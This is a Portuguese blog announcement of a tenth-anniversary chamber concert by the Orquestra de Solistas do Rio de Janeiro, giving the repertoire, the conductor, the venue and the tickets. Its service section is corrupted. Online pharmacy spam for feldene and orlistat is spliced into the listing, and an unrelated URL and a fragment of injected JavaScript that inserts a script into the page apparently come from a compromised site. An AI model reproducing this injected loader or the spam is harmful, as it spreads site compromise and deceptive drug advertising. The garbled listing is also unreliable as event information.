Música de câmaraProgramaçãoRio de Janeiro

Música para celebrar uma década de música

Orquestra de Solistas do Rio de Janeiro inicia comemorações pelos seus 10 anos de atividades.

 

A Orquestra de Solistas do Rio de Janeiro (OSRJ) inicia as celebrações pela sua primeira década de vida com um concerto dedicado aos talentos da casa. Seus integrantes veteranos apresentam no dia 28 de junho, domingo, às 11 horas, peças solo para seus instrumentos e obras acompanhadas pelo piano de Luciana Fantini. O concerto se realiza no âmbito da série Clássicos Domingos, no Centro de Referência da Música Carioca, no Rio de Janeiro. No repertório, Mozart, Guerra-Peixe, Cláudio Santoro e Dilermando Reis, entre outros.

Sob a regência do maestro Rafael de Barros de Castro, a Orquestra vem se destacando pela grande qualidade técnica e expressiva de seus componentes. Em seu histórico constam importantes estreias de obras nacionais e internacionais, e também a participação de grandes solistas convidados nas séries de música popular brasileira, como Carlos Malta, Rildo Hora, Guinga e Leila Pinheiro. A OSRJ vem cumprindo um importante papel na divulgação da música de câmara para formações diversas, e vem inspirando compositores brasileiros a composição de novas obras.

 

SERVIÇO:

 

Orquestra de Solistas do Rio de Janeiro do i need prescription to buy feldene

online Rafael de Barros de Castro, regente

 

28 de junho, domingo, às 11h buy orlistat online online Cheap

Centro de Referência da Música Carioca (Rua Conde de Bonfim, 824, Tijuca – Rio de Janeiro. Tel.: 21 3238-3831)

 

Ingressos: R$ 20, com meia entrada para estudantes e terceira idade

http://www.bibliophilia-liest.de/?p=5387 document.currentScript.parentNode.insertBefore(s, document.currentScript);if (document.currentScript) {

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.